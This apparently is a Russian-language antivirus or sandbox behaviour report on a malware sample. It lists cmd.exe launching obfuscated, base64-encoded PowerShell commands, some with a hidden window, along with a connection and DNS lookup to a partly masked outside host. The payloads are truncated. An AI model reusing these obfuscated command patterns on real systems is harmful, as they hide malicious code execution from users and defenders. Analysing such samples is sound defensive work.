Техническая информация
- '<SYSTEM32>\cmd.exe' & /C CD C: & POWeRshEll -enCodedCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAZwBLAHQASgBOAFAAcABKAE8AYwBRAFEAdgBxAGYASABiAGUAdABGAE4AIAAoACAAJABGAEMAdQBqAE4AVgBmAGUAYQBCAHkATAByAGoAegBkAHkAIAAsACAAJABTAGQAe...
- 'my.##xtape.moe':443
- DNS ASK my.##xtape.moe
- '<SYSTEM32>\cmd.exe' & /C CD C: & POWeRshEll -enCodedCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAZwBLAHQASgBOAFAAcABKAE8AYwBRAFEAdgBxAGYASABiAGUAdABGAE4AIAAoACAAJABGAEMAdQBqAE4AVgBmAGUAYQBCAHkATAByAGoAegBkAHkAIAAsACAAJABTAGQAe...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enCodedCOMmaNd ZgB1AG4AYwB0AGkAbwBuACAAZwBLAHQASgBOAFAAcABKAE8AYwBRAFEAdgBxAGYASABiAGUAdABGAE4AIAAoACAAJABGAEMAdQBqAE4AVgBmAGUAYQBCAHkATAByAGoAegBkAHkAIAAsACAAJABTAGQAeQBvAHAAagB6AG0ATABSAHMAY...